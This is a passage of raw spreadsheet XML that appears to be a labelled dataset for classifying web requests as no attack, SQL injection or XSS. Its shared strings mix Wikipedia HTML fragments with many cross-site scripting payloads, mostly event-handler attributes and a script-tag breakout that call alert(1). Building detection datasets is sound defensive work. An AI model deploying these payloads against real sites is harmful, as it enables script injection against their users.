    <t xml:space="preserve">	 &lt;div class="thumbinner" style="width:222px;"&gt;&lt;a href="/wiki/File:Capek_play.jpg" class="image"&gt;&lt;img alt="" src="//upload.wikimedia.org/wikipedia/commons/thumb/8/87/Capek_play.jpg/220px-Capek_play.jpg" decoding="async" width="220" height="123" class="thumbimage" srcset="//upload.wikimedia.org/wikipedia/commons/thumb/8/87/Capek_play.jpg/330px-Capek_play.jpg 1.5x, //upload.wikimedia.org/wikipedia/commons/thumb/8/87/Capek_play.jpg/440px-Capek_play.jpg 2x" data-file-width="566" data-file-height="316" /&gt; &lt;/a&gt;  &lt;div class="thumbcaption"&gt;</t>
  </si>
  <si>
    <t>&lt;li draggable="true" ondragend="alert(1)"&gt;test&lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;canvas onmousedown="alert(1)"&gt;test&lt;/canvas&gt;</t>
  </si>
  <si>
    <t>&lt;div draggable="true" contenteditable&gt;drag me&lt;/div&gt;&lt;small ondragover=alert(1) contenteditable&gt;drop here&lt;/small&gt;</t>
  </si>
  <si>
    <t>&lt;h1 id=x tabindex=1 onbeforeactivate=alert(1)&gt;&lt;/h1&gt;</t>
  </si>
  <si>
    <t>&lt;slot onmouseover="alert(1)"&gt;test&lt;/slot&gt;</t>
  </si>
  <si>
    <t>&lt;label draggable="true" ondragleave="alert(1)"&gt;test&lt;/label&gt;</t>
  </si>
  <si>
    <t>&lt;table draggable="true" ondragstart="alert(1)"&gt;test&lt;/table&gt;</t>
  </si>
  <si>
    <t>&lt;i id=x tabindex=1 onfocusin=alert(1)&gt;&lt;/i&gt;</t>
  </si>
  <si>
    <t>&lt;article onpointerdown=alert(1)&gt;XSS&lt;/article&gt;</t>
  </si>
  <si>
    <t>&lt;article onpointermove=alert(1)&gt;XSS&lt;/article&gt;</t>
  </si>
  <si>
    <t>"&gt;&lt;/SCRIPT&gt;”&gt;’&gt;&lt;SCRIPT&gt;alert(String.fromCharCode(88,83,83))&lt;/SCRIPT&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Hypothetico-deductive_model" title="Hypothetico-deductive model"&gt;Hypothetico-deductive model &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/J%C3%BCrgen_Habermas" title="Jürgen Habermas"&gt;Jürgen Habermas &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt; &lt;span class="toctext"&gt;Further reading </t>
  </si>
  <si>
    <t>&lt;abbr draggable="true" ondrag="alert(1)"&gt;test&lt;/abbr&gt;</t>
  </si>
  <si>
    <t>&lt;area onpointerleave=alert(1)&gt;XSS&lt;/area&gt;</t>
  </si>
  <si>
    <t>&lt;label draggable="true" ondragend="alert(1)"&gt;test&lt;/label&gt;</t>
  </si>
  <si>
    <t>&lt;h1 onmouseup="alert(1)"&gt;test&lt;/h1&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li id="cite_note-Computer_vision-127"&gt;&lt;span class="mw-cite-backlink"&gt;&lt;b&gt;&lt;a href="#cite_ref-Computer_vision_127-0"&gt;^ &lt;/a&gt; &lt;/b&gt; </t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}&lt;/style&gt;&lt;col id=x style="position:absolute;" onanimationcancel="alert(1)"&gt;&lt;/col&gt;</t>
  </si>
  <si>
    <t>&lt;nav onmouseup="alert(1)"&gt;test&lt;/nav&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;:target {color:red;}&lt;/style&gt;&lt;section id=x style="transition:color 1s" ontransitionend=alert(1)&gt;&lt;/section&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes slidein {}&lt;/style&gt;&lt;details style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"&gt;&lt;/details&gt;</t>
  </si>
  <si>
    <t>&lt;frameset onmouseleave="alert(1)"&gt;test&lt;/frameset&gt;</t>
  </si>
  <si>
    <t>&lt;ruby draggable="true" ondragleave="alert(1)"&gt;test&lt;/ruby&gt;</t>
  </si>
  <si>
    <t>&lt;abbr ondblclick="alert(1)"&gt;test&lt;/abbr&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Articulated_robot" title="Articulated robot"&gt;Articulated &lt;/a&gt;</t>
  </si>
  <si>
    <t>&lt;tt onclick="alert(1)"&gt;test&lt;/tt&gt;</t>
  </si>
  <si>
    <t>&lt;table id=x tabindex=1 onbeforeactivate=alert(1)&gt;&lt;/table&gt;</t>
  </si>
  <si>
    <t>&lt;multicol onbeforepaste="alert(1)" contenteditable&gt;test&lt;/multicol&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes slidein {}&lt;/style&gt;&lt;optgroup style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"&gt;&lt;/optgroup&gt;</t>
  </si>
  <si>
    <t>&lt;footer draggable="true" ondragenter="alert(1)"&gt;test&lt;/footer&gt;</t>
  </si>
  <si>
    <t>&lt;rb onkeyup="alert(1)" contenteditable&gt;test&lt;/rb&gt;</t>
  </si>
  <si>
    <t>&lt;details onpointerover=alert(1)&gt;XSS&lt;/details&gt;</t>
  </si>
  <si>
    <t>&lt;element onkeydown="alert(1)" contenteditable&gt;test&lt;/element&gt;</t>
  </si>
  <si>
    <t xml:space="preserve"> &lt;/p&gt;&lt;p&gt;&lt;a href="/wiki/Default_logic" title="Default logic"&gt;Default logics &lt;/a&gt;, &lt;a href="/wiki/Non-monotonic_logic" title="Non-monotonic logic"&gt;non-monotonic logics &lt;/a&gt; and &lt;a href="/wiki/Circumscription_(logic)" title="Circumscription (logic)"&gt;circumscription &lt;/a&gt;&lt;sup id="cite_ref-Default_reasoning_and_non-monotonic_logic_105-1" class="reference"&gt;&lt;a href="#cite_note-Default_reasoning_and_non-monotonic_logic-105"&gt;&amp;#91;102&amp;#93; &lt;/a&gt; &lt;/sup&gt; are forms of logic designed to help with default reasoning and the &lt;a href="/wiki/Qualification_problem" title="Qualification problem"&gt;qualification problem &lt;/a&gt;. Several extensions of logic have been designed to handle specific domains of &lt;a href="/wiki/Knowledge_representation" class="mw-redirect" title="Knowledge representation"&gt;knowledge &lt;/a&gt;, such as: &lt;a href="/wiki/Description_logic" title="Description logic"&gt;description logics &lt;/a&gt;;&lt;sup id="cite_ref-Representing_categories_and_relations_93-1" class="reference"&gt;&lt;a href="#cite_note-Representing_categories_and_relations-93"&gt;&amp;#91;90&amp;#93; &lt;/a&gt; &lt;/sup&gt; &lt;a href="/wiki/Situation_calculus" title="Situation calculus"&gt;situation calculus &lt;/a&gt;, &lt;a href="/wiki/Event_calculus" title="Event calculus"&gt;event calculus &lt;/a&gt; and &lt;a href="/wiki/Fluent_calculus" title="Fluent calculus"&gt;fluent calculus &lt;/a&gt; (for representing events and time);&lt;sup id="cite_ref-Representing_time_94-1" class="reference"&gt;&lt;a href="#cite_note-Representing_time-94"&gt;&amp;#91;91&amp;#93; &lt;/a&gt; &lt;/sup&gt; &lt;a href="/wiki/Causality#Causal_calculus" title="Causality"&gt;causal calculus &lt;/a&gt;;&lt;sup id="cite_ref-Representing_causation_95-1" class="reference"&gt;&lt;a href="#cite_note-Representing_causation-95"&gt;&amp;#91;92&amp;#93; &lt;/a&gt; &lt;/sup&gt; &lt;a href="/wiki/Belief_revision" title="Belief revision"&gt;belief calculus (belief revision) &lt;/a&gt;;&lt;sup id="cite_ref-203" class="reference"&gt;&lt;a href="#cite_note-203"&gt;&amp;#91;198&amp;#93; &lt;/a&gt; &lt;/sup&gt; and &lt;a href="/wiki/Modal_logic" title="Modal logic"&gt;modal logics &lt;/a&gt;.&lt;sup id="cite_ref-Representing_knowledge_about_knowledge_96-1" class="reference"&gt;&lt;a href="#cite_note-Representing_knowledge_about_knowledge-96"&gt;&amp;#91;93&amp;#93; &lt;/a&gt; &lt;/sup&gt; Logics to model contradictory or inconsistent statements arising in multi-agent systems have also been designed, such as &lt;a href="/wiki/Paraconsistent_logic" title="Paraconsistent logic"&gt;paraconsistent logics &lt;/a&gt;.</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Scientific_formalism" title="Scientific formalism"&gt;Scientific formalism &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;img onpointerenter=alert(1)&gt;XSS&lt;/img&gt;</t>
  </si>
  <si>
    <t>&lt;source onbeforepaste="alert(1)" contenteditable&gt;test&lt;/source&gt;</t>
  </si>
  <si>
    <t>&lt;div draggable="true" contenteditable&gt;drag me&lt;/div&gt;&lt;head ondrop=alert(1) contenteditable&gt;drop here&lt;/head&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li&gt;&lt;cite id="CITEREFDomingos2015" class="citation book"&gt;&lt;a href="/wiki/Pedro_Domingos" title="Pedro Domingos"&gt;Domingos, Pedro &lt;/a&gt; (2015). &lt;a href="/wiki/The_Master_Algorithm" title="The Master Algorithm"&gt;&lt;i&gt;The Master Algorithm: How the Quest for the Ultimate Learning Machine Will Remake Our World &lt;/i&gt; &lt;/a&gt;. Basic Books. &lt;a href="/wiki/International_Standard_Book_Number" title="International Standard Book Number"&gt;ISBN &lt;/a&gt;&amp;#160;&lt;a href="/wiki/Special:BookSources/978-0-465-06192-1" title="Special:BookSources/978-0-465-06192-1"&gt;&lt;bdi&gt;978-0-465-06192-1 &lt;/bdi&gt; &lt;/a&gt;. &lt;/cite&gt;&lt;span title="ctx_ver=Z39.88-2004&amp;amp;rft_val_fmt=info%3Aofi%2Ffmt%3Akev%3Amtx%3Abook&amp;amp;rft.genre=book&amp;amp;rft.btitle=The+Master+Algorithm%3A+How+the+Quest+for+the+Ultimate+Learning+Machine+Will+Remake+Our+World&amp;amp;rft.pub=Basic+Books&amp;amp;rft.date=2015&amp;amp;rft.isbn=978-0-465-06192-1&amp;amp;rft.aulast=Domingos&amp;amp;rft.aufirst=Pedro&amp;amp;rfr_id=info%3Asid%2Fen.wikipedia.org%3AArtificial+intelligence" class="Z3988"&gt; </t>
  </si>
  <si>
    <t>attack type</t>
  </si>
  <si>
    <t>request method (POST/GET)</t>
  </si>
  <si>
    <t>added in (param/url)</t>
  </si>
  <si>
    <t>POST</t>
  </si>
  <si>
    <t>param</t>
  </si>
  <si>
    <t>type / status</t>
  </si>
  <si>
    <t>http status</t>
  </si>
  <si>
    <t>http status name</t>
  </si>
</sst>
</file>

<file path=xl/styles.xml><?xml version="1.0" encoding="utf-8"?>
<styleSheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:x14ac="http://schemas.microsoft.com/office/spreadsheetml/2009/9/ac" mc:Ignorable="x14ac">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color rgb="FF000000"/>
      <name val="Calibri"/>
      <family val="2"/>
    </font>
    <font>
      <sz val="11"/>
      <color rgb="FF000000"/>
      <name val="Calibri"/>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6">
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0"/>
    <xf numFmtId="0" fontId="18" fillId="0" borderId="0" xfId="0" applyFont="1" applyAlignment="1">
      <alignment vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="19" fillId="0" borderId="0" xfId="0" applyFont="1"/>
    <xf numFmtId="0" fontId="19" fillId="0" borderId="0" xfId="0" applyFont="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="16" fillId="0" borderId="0" xfId="0" applyFont="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="16" fillId="0" borderId="0" xfId="0" applyFont="1" applyAlignment="1">
      <alignment horizontal="left" vertic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687"/>
  <sheetViews>
    <sheetView tabSelected="1" workbookViewId="0">
      <selection activeCell="G2" sqref="G2"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultRowHeight="14.4" x14ac:dyDescent="0.3"/>
  <cols>
    <col min="1" max="1" width="139.44140625" customWidth="1"/>
    <col min="2" max="2" width="10.77734375" customWidth="1"/>
    <col min="3" max="3" width="12" customWidth="1"/>
    <col min="4" max="4" width="11.109375" customWidth="1"/>
    <col min="5" max="5" width="11.44140625" customWidth="1"/>
  </cols>
  <sheetData>
    <row r="1" spans="1:7" ht="43.2" x14ac:dyDescent="0.3">
      <c r="A1" s="4" t="s">
        <v>0</v>
      </c>
      <c r="B1" s="5" t="s">
        <v>10923</v>
      </c>
      <c r="C1" s="1" t="s">
        <v>10918</v>
      </c>
      <c r="D1" s="1" t="s">
        <v>10919</v>
      </c>
      <c r="E1" s="1" t="s">
        <v>10920</v>
      </c>
      <c r="F1" s="1" t="s">
        <v>10924</v>
      </c>
      <c r="G1" s="1" t="s">
        <v>10925</v>
      </c>
    </row>
    <row r="2" spans="1:7" x14ac:dyDescent="0.3">
      <c r="A2" t="s">
        <v>1</v>
      </c>
      <c r="B2">
        <v>0</v>
      </c>
      <c r="C2" s="2" t="str">
        <f>IF(B2=0,"No Attack", IF(B2=1, "SQL Injection", "XSS") )</f>
        <v>No Attack</v>
      </c>
      <c r="D2" s="3" t="s">
        <v>10921</v>
      </c>
      <c r="E2" s="3" t="s">
        <v>10922</v>
      </c>
    </row>
    <row r="3" spans="1:7" x14ac:dyDescent="0.3">
      <c r="A3" t="s">
        <v>3</v>
      </c>
      <c r="B3">
        <v>0</v>
      </c>
      <c r="C3" s="2" t="str">
        <f>IF(B3=0,"No Attack", IF(B3=1, "SQL Injection", "XSS") )</f>
        <v>No Attack</v>
      </c>
      <c r="D3" s="3" t="s">
        <v>10921</v>
      </c>
      <c r="E3" s="3" t="s">
        <v>10922</v>
      </c>
    </row>
    <row r="4" spans="1:7" x14ac:dyDescent="0.3">
      <c r="A4" t="s">
        <v>4</v>
      </c>
      <c r="B4">
        <v>0</v>
      </c>
      <c r="C4" s="2" t="str">
        <f>IF(B4=0,"No Attack", IF(B4=1, "SQL Injection", "XSS") )</f>
        <v>No Attack</v>
      </c>
      <c r="D4" s="3" t="s">
        <v>10921</v>
      </c>
      <c r="E4" s="3" t="s">
        <v>10922</v>
      </c>
    </row>
    <row r="5" spans="1:7" x14ac:dyDescent="0.3">
      <c r="A5" t="s">
        <v>5</v>
      </c>
      <c r="B5">
        <v>0</v>
      </c>
      <c r="C5" s="2" t="str">
        <f>IF(B5=0,"No Attack", IF(B5=1, "SQL Injection", "XSS") )</f>
        <v>No Attack</v>
      </c>
      <c r="D5" s="3" t="s">
        <v>10921</v>
      </c>
      <c r="E5" s="3" t="s">
        <v>10922</v>
      </c>
    </row>
    <row r="6" spans="1:7" x14ac:dyDescent="0.3">
      <c r="A6" t="s">
        <v>6</v>
      </c>
      <c r="B6">
        <v>0</v>
      </c>
      <c r="C6" s="2" t="str">
        <f>IF(B6=0,"No Attack", IF(B6=1, "SQL Injection", "XSS") )</f>
        <v>No Attack</v>
      </c>
      <c r="D6" s="3" t="s">
        <v>10921</v>
      </c>
      <c r="E6" s="3" t="s">
        <v>10922</v>
      </c>
    </row>
    <row r="7" spans="1:7" x14ac:dyDescent="0.3">
      <c r="A7" t="s">
        <v>7</v>
      </c>
      <c r="B7">
        <v>0</v>
      </c>
      <c r="C7" s="2" t="str">
        <f>IF(B7=0,"No Attack", IF(B7=1, "SQL Injection", "XSS") )</f>
        <v>No Attack</v>
      </c>
      <c r="D7" s="3" t="s">
        <v>10921</v>
      </c>
      <c r="E7" s="3" t="s">
        <v>10922</v>
      </c>
    </row>
    <row r="8" spans="1:7" x14ac:dyDescent="0.3">
      <c r="A8" t="s">
        <v>8</v>
      </c>
      <c r="B8">
        <v>0</v>
      </c>
      <c r="C8" s="2" t="str">
        <f>IF(B8=0,"No Attack", IF(B8=1, "SQL Injection", "XSS") )</f>
        <v>No Attack</v>
      </c>
      <c r="D8" s="3" t="s">
        <v>10921</v>
      </c>
      <c r="E8" s="3" t="s">
        <v>10922</v>
      </c>
    </row>
    <row r="9" spans="1:7" x14ac:dyDescent="0.3">
      <c r="A9" t="s">
        <v>9</v>
      </c>
      <c r="B9">
        <v>0</v>
      </c>
      <c r="C9" s="2" t="str">
        <f>IF(B9=0,"No Attack", IF(B9=1, "SQL Injection", "XSS") )</f>
        <v>No Attack</v>
      </c>
      <c r="D9" s="3" t="s">
        <v>10921</v>
      </c>
      <c r="E9" s="3" t="s">
        <v>10922</v>
      </c>
    </row>
    <row r="10" spans="1:7" x14ac:dyDescent="0.3">
      <c r="A10" t="s">
        <v>10</v>
      </c>
      <c r="B10">
        <v>0</v>
      </c>
      <c r="C10" s="2" t="str">
        <f>IF(B10=0,"No Attack", IF(B10=1, "SQL Injection", "XSS") )</f>
        <v>No Attack</v>
      </c>
      <c r="D10" s="3" t="s">
        <v>10921</v>
      </c>
      <c r="E10" s="3" t="s">
        <v>10922</v>
      </c>
    </row>
    <row r="11" spans="1:7" x14ac:dyDescent="0.3">
      <c r="A11" t="s">
        <v>11</v>
      </c>
      <c r="B11">
        <v>0</v>
      </c>
      <c r="C11" s="2" t="str">
        <f>IF(B11=0,"No Attack", IF(B11=1, "SQL Injection", "XSS") )</f>
        <v>No Attack</v>
      </c>
      <c r="D11" s="3" t="s">
        <v>10921</v>
      </c>
      <c r="E11" s="3" t="s">
        <v>10922</v>
      </c>
    </row>
    <row r="12" spans="1:7" x14ac:dyDescent="0.3">
      <c r="A12" t="s">
        <v>10</v>
      </c>
      <c r="B12">
        <v>0</v>
      </c>
      <c r="C12" s="2" t="str">
        <f>IF(B12=0,"No Attack", IF(B12=1, "SQL Injection", "XSS") )</f>
        <v>No Attack</v>
      </c>
      <c r="D12" s="3" t="s">
        <v>10921</v>
      </c>
      <c r="E12" s="3" t="s">
        <v>10922</v>
      </c>
    </row>
    <row r="13" spans="1:7" x14ac:dyDescent="0.3">
      <c r="A13" t="s">
        <v>15</v>
      </c>
      <c r="B13">
        <v>0</v>
      </c>
      <c r="C13" s="2" t="str">
        <f>IF(B13=0,"No Attack", IF(B13=1, "SQL Injection", "XSS") )</f>
        <v>No Attack</v>
      </c>
      <c r="D13" s="3" t="s">
        <v>10921</v>
      </c>
      <c r="E13" s="3" t="s">
        <v>10922</v>
      </c>
    </row>
    <row r="14" spans="1:7" x14ac:dyDescent="0.3">
      <c r="A14" t="s">
        <v>19</v>
      </c>
      <c r="B14">
        <v>0</v>
      </c>
      <c r="C14" s="2" t="str">
        <f>IF(B14=0,"No Attack", IF(B14=1, "SQL Injection", "XSS") )</f>
        <v>No Attack</v>
      </c>
      <c r="D14" s="3" t="s">
        <v>10921</v>
      </c>
      <c r="E14" s="3" t="s">
        <v>10922</v>
      </c>
    </row>
    <row r="15" spans="1:7" x14ac:dyDescent="0.3">
      <c r="A15" t="s">
        <v>21</v>
      </c>
      <c r="B15">
        <v>0</v>
      </c>
      <c r="C15" s="2" t="str">
        <f>IF(B15=0,"No Attack", IF(B15=1, "SQL Injection", "XSS") )</f>
        <v>No Attack</v>
      </c>
      <c r="D15" s="3" t="s">
        <v>10921</v>
      </c>
      <c r="E15" s="3" t="s">
        <v>10922</v>
      </c>
    </row>
    <row r="16" spans="1:7" x14ac:dyDescent="0.3">
      <c r="A16" t="s">
        <v>22</v>
      </c>
      <c r="B16">
        <v>0</v>
      </c>
      <c r="C16" s="2" t="str">
        <f>IF(B16=0,"No Attack", IF(B16=1, "SQL Injection", "XSS") )</f>
        <v>No Attack</v>
      </c>
      <c r="D16" s="3" t="s">
        <v>10921</v>
      </c>
      <c r="E16" s="3" t="s">
        <v>10922</v>
      </c>
    </row>
    <row r="17" spans="1:5" x14ac:dyDescent="0.3">
      <c r="A17" t="s">
        <v>26</v>
      </c>
      <c r="B17">
        <v>0</v>
      </c>
      <c r="C17" s="2" t="str">
        <f>IF(B17=0,"No Attack", IF(B17=1, "SQL Injection", "XSS") )</f>
        <v>No Attack</v>
      </c>
      <c r="D17" s="3" t="s">
        <v>10921</v>
      </c>
      <c r="E17" s="3" t="s">
        <v>10922</v>
      </c>
    </row>
    <row r="18" spans="1:5" x14ac:dyDescent="0.3">
      <c r="A18" t="s">
        <v>15</v>
      </c>
      <c r="B18">
        <v>0</v>
      </c>
      <c r="C18" s="2" t="str">
        <f>IF(B18=0,"No Attack", IF(B18=1, "SQL Injection", "XSS") )</f>
        <v>No Attack</v>
      </c>
      <c r="D18" s="3" t="s">
        <v>10921</v>
      </c>
      <c r="E18" s="3" t="s">
        <v>10922</v>
      </c>
    </row>
    <row r="19" spans="1:5" x14ac:dyDescent="0.3">
      <c r="A19" t="s">
        <v>28</v>
      </c>
      <c r="B19">
        <v>0</v>
      </c>
      <c r="C19" s="2" t="str">
        <f>IF(B19=0,"No Attack", IF(B19=1, "SQL Injection", "XSS") )</f>
        <v>No Attack</v>
      </c>
      <c r="D19" s="3" t="s">
        <v>10921</v>
      </c>
      <c r="E19" s="3" t="s">
        <v>10922</v>
      </c>
    </row>
    <row r="20" spans="1:5" x14ac:dyDescent="0.3">
      <c r="A20" t="s">
        <v>30</v>
      </c>
      <c r="B20">
        <v>0</v>
      </c>
      <c r="C20" s="2" t="str">
        <f>IF(B20=0,"No Attack", IF(B20=1, "SQL Injection", "XSS") )</f>
        <v>No Attack</v>
      </c>
      <c r="D20" s="3" t="s">
        <v>10921</v>
      </c>
      <c r="E20" s="3" t="s">
        <v>10922</v>
      </c>
    </row>
    <row r="21" spans="1:5" x14ac:dyDescent="0.3">
      <c r="A21" t="s">
        <v>10</v>
      </c>
      <c r="B21">
        <v>0</v>
      </c>
      <c r="C21" s="2" t="str">
        <f>IF(B21=0,"No Attack", IF(B21=1, "SQL Injection", "XSS") )</f>
        <v>No Attack</v>
      </c>
      <c r="D21" s="3" t="s">
        <v>10921</v>
      </c>
      <c r="E21" s="3" t="s">
        <v>10922</v>
      </c>
    </row>
    <row r="22" spans="1:5" x14ac:dyDescent="0.3">
      <c r="A22" t="s">
        <v>33</v>
      </c>
      <c r="B22">
        <v>0</v>
      </c>
      <c r="C22" s="2" t="str">
        <f>IF(B22=0,"No Attack", IF(B22=1, "SQL Injection", "XSS") )</f>
        <v>No Attack</v>
      </c>
      <c r="D22" s="3" t="s">
        <v>10921</v>
      </c>
      <c r="E22" s="3" t="s">
        <v>10922</v>
      </c>
    </row>
    <row r="23" spans="1:5" x14ac:dyDescent="0.3">
      <c r="A23" t="s">
        <v>37</v>
      </c>
      <c r="B23">
        <v>0</v>
      </c>
      <c r="C23" s="2" t="str">
        <f>IF(B23=0,"No Attack", IF(B23=1, "SQL Injection", "XSS") )</f>
        <v>No Attack</v>
      </c>
      <c r="D23" s="3" t="s">
        <v>10921</v>
      </c>
      <c r="E23" s="3" t="s">
        <v>10922</v>
      </c>
    </row>
    <row r="24" spans="1:5" x14ac:dyDescent="0.3">
      <c r="A24" t="s">
        <v>38</v>
      </c>
      <c r="B24">
        <v>0</v>
      </c>
      <c r="C24" s="2" t="str">
        <f>IF(B24=0,"No Attack", IF(B24=1, "SQL Injection", "XSS") )</f>
        <v>No Attack</v>
      </c>
      <c r="D24" s="3" t="s">
        <v>10921</v>
      </c>
      <c r="E24" s="3" t="s">
        <v>10922</v>
      </c>
    </row>
    <row r="25" spans="1:5" x14ac:dyDescent="0.3">
      <c r="A25" t="s">
        <v>40</v>
      </c>
      <c r="B25">
        <v>0</v>
      </c>
      <c r="C25" s="2" t="str">
        <f>IF(B25=0,"No Attack", IF(B25=1, "SQL Injection", "XSS") )</f>
        <v>No Attack</v>
      </c>
      <c r="D25" s="3" t="s">
        <v>10921</v>
      </c>
      <c r="E25" s="3" t="s">
        <v>10922</v>
      </c>
    </row>
    <row r="26" spans="1:5" x14ac:dyDescent="0.3">
      <c r="A26" t="s">
        <v>41</v>
      </c>
      <c r="B26">
        <v>0</v>
      </c>
      <c r="C26" s="2" t="str">
        <f>IF(B26=0,"No Attack", IF(B26=1, "SQL Injection", "XSS") )</f>
        <v>No Attack</v>
      </c>
      <c r="D26" s="3" t="s">
        <v>10921</v>
      </c>
      <c r="E26" s="3" t="s">
        <v>10922</v>
      </c>
    </row>
    <row r="27" spans="1:5" x14ac:dyDescent="0.3">
      <c r="A27" t="s">
        <v>42</v>
      </c>
      <c r="B27">
        <v>0</v>
      </c>
      <c r="C27" s="2" t="str">
        <f>IF(B27=0,"No Attack", IF(B27=1, "SQL Injection", "XSS") )</f>
        <v>No Attack</v>
      </c>
      <c r="D27" s="3" t="s">
        <v>10921</v>
      </c>
      <c r="E27" s="3" t="s">
        <v>10922</v>
      </c>
    </row>
    <row r="28" spans="1:5" x14ac:dyDescent="0.3">
      <c r="A28" t="s">
        <v>43</v>
      </c>
      <c r="B28">
        <v>0</v>
      </c>
      <c r="C28" s="2" t="str">
        <f>IF(B28=0,"No Attack", IF(B28=1, "SQL Injection", "XSS") )</f>
        <v>No Attack</v>
      </c>
      <c r="D28" s="3" t="s">
        <v>10921</v>
      </c>
      <c r="E28" s="3" t="s">
        <v>10922</v>
      </c>
    </row>
    <row r="29" spans="1:5" x14ac:dyDescent="0.3">
      <c r="A29" t="s">
        <v>44</v>
      </c>
      <c r="B29">
        <v>0</v>
      </c>
      <c r="C29" s="2" t="str">
        <f>IF(B29=0,"No Attack", IF(B29=1, "SQL Injection", "XSS") )</f>
        <v>No Attack</v>
      </c>
      <c r="D29" s="3" t="s">
        <v>10921</v>
      </c>
      <c r="E29" s="3" t="s">
        <v>10922</v>
      </c>
    </row>
    <row r="30" spans="1:5" x14ac:dyDescent="0.3">
      <c r="A30" t="s">
        <v>46</v>
      </c>
      <c r="B30">
        <v>0</v>
      </c>
      <c r="C30" s="2" t="str">
        <f>IF(B30=0,"No Attack", IF(B30=1, "SQL Injection", "XSS") )</f>
        <v>No Attack</v>
      </c>
      <c r="D30" s="3" t="s">
        <v>10921</v>
      </c>
      <c r="E30" s="3" t="s">
        <v>10922</v>
      </c>
    </row>
    <row r="31" spans="1:5" x14ac:dyDescent="0.3">
      <c r="A31" t="s">
        <v>47</v>
      </c>
      <c r="B31">
        <v>0</v>
      </c>
      <c r="C31" s="2" t="str">
        <f>IF(B31=0,"No Attack", IF(B31=1, "SQL Injection", "XSS") )</f>
        <v>No Attack</v>
      </c>
      <c r="D31" s="3" t="s">
        <v>10921</v>
      </c>
      <c r="E31" s="3" t="s">
        <v>10922</v>
      </c>
    </row>
    <row r="32" spans="1:5" x14ac:dyDescent="0.3">
      <c r="A32" t="s">
        <v>49</v>
      </c>
      <c r="B32">
        <v>0</v>
      </c>
      <c r="C32" s="2" t="str">
        <f>IF(B32=0,"No Attack", IF(B32=1, "SQL Injection", "XSS") )</f>
        <v>No Attack</v>
      </c>
      <c r="D32" s="3" t="s">
        <v>10921</v>
      </c>
      <c r="E32" s="3" t="s">
        <v>10922</v>
      </c>
    </row>
    <row r="33" spans="1:5" x14ac:dyDescent="0.3">
      <c r="A33" t="s">
        <v>52</v>
      </c>
      <c r="B33">
        <v>0</v>
      </c>
      <c r="C33" s="2" t="str">
        <f>IF(B33=0,"No Attack", IF(B33=1, "SQL Injection", "XSS") )</f>
        <v>No Attack</v>
      </c>
      <c r="D33" s="3" t="s">
        <v>10921</v>
      </c>
      <c r="E33" s="3" t="s">
        <v>10922</v>
      </c>
    </row>
    <row r="34" spans="1:5" x14ac:dyDescent="0.3">
      <c r="A34" t="s">
        <v>53</v>
      </c>
      <c r="B34">
        <v>0</v>
      </c>
      <c r="C34" s="2" t="str">
        <f>IF(B34=0,"No Attack", IF(B34=1, "SQL Injection", "XSS") )</f>
        <v>No Attack</v>
      </c>
      <c r="D34" s="3" t="s">
        <v>10921</v>
      </c>
      <c r="E34" s="3" t="s">
        <v>10922</v>
      </c>
    </row>
    <row r="35" spans="1:5" x14ac:dyDescent="0.3">
      <c r="A35" t="s">
        <v>56</v>
      </c>
      <c r="B35">
        <v>0</v>
      </c>
      <c r="C35" s="2" t="str">
        <f>IF(B35=0,"No Attack", IF(B35=1, "SQL Injection", "XSS") )</f>
        <v>No Attack</v>
      </c>
      <c r="D35" s="3" t="s">
        <v>10921</v>
      </c>
      <c r="E35" s="3" t="s">
        <v>10922</v>
      </c>
    </row>
    <row r="36" spans="1:5" x14ac:dyDescent="0.3">
      <c r="A36" t="s">
        <v>57</v>
      </c>
      <c r="B36">
        <v>0</v>
      </c>
      <c r="C36" s="2" t="str">
        <f>IF(B36=0,"No Attack", IF(B36=1, "SQL Injection", "XSS") )</f>
        <v>No Attack</v>
      </c>
      <c r="D36" s="3" t="s">
        <v>10921</v>
      </c>
      <c r="E36" s="3" t="s">
        <v>10922</v>
      </c>
    </row>
    <row r="37" spans="1:5" x14ac:dyDescent="0.3">
      <c r="A37" t="s">
        <v>58</v>
      </c>
      <c r="B37">
        <v>0</v>
      </c>
      <c r="C37" s="2" t="str">
        <f>IF(B37=0,"No Attack", IF(B37=1, "SQL Injection", "XSS") )</f>
        <v>No Attack</v>
      </c>
      <c r="D37" s="3" t="s">
        <v>10921</v>
      </c>
      <c r="E37" s="3" t="s">
        <v>10922</v>
      </c>
    </row>
    <row r="38" spans="1:5" x14ac:dyDescent="0.3">
      <c r="A38" t="s">
        <v>66</v>
      </c>
      <c r="B38">
        <v>0</v>
      </c>
      <c r="C38" s="2" t="str">
        <f>IF(B38=0,"No Attack", IF(B38=1, "SQL Injection", "XSS") )</f>
        <v>No Attack</v>
      </c>
      <c r="D38" s="3" t="s">
        <v>10921</v>
      </c>
      <c r="E38" s="3" t="s">
        <v>10922</v>
      </c>
    </row>
    <row r="39" spans="1:5" x14ac:dyDescent="0.3">
      <c r="A39" t="s">
        <v>41</v>
      </c>
      <c r="B39">
        <v>0</v>
      </c>
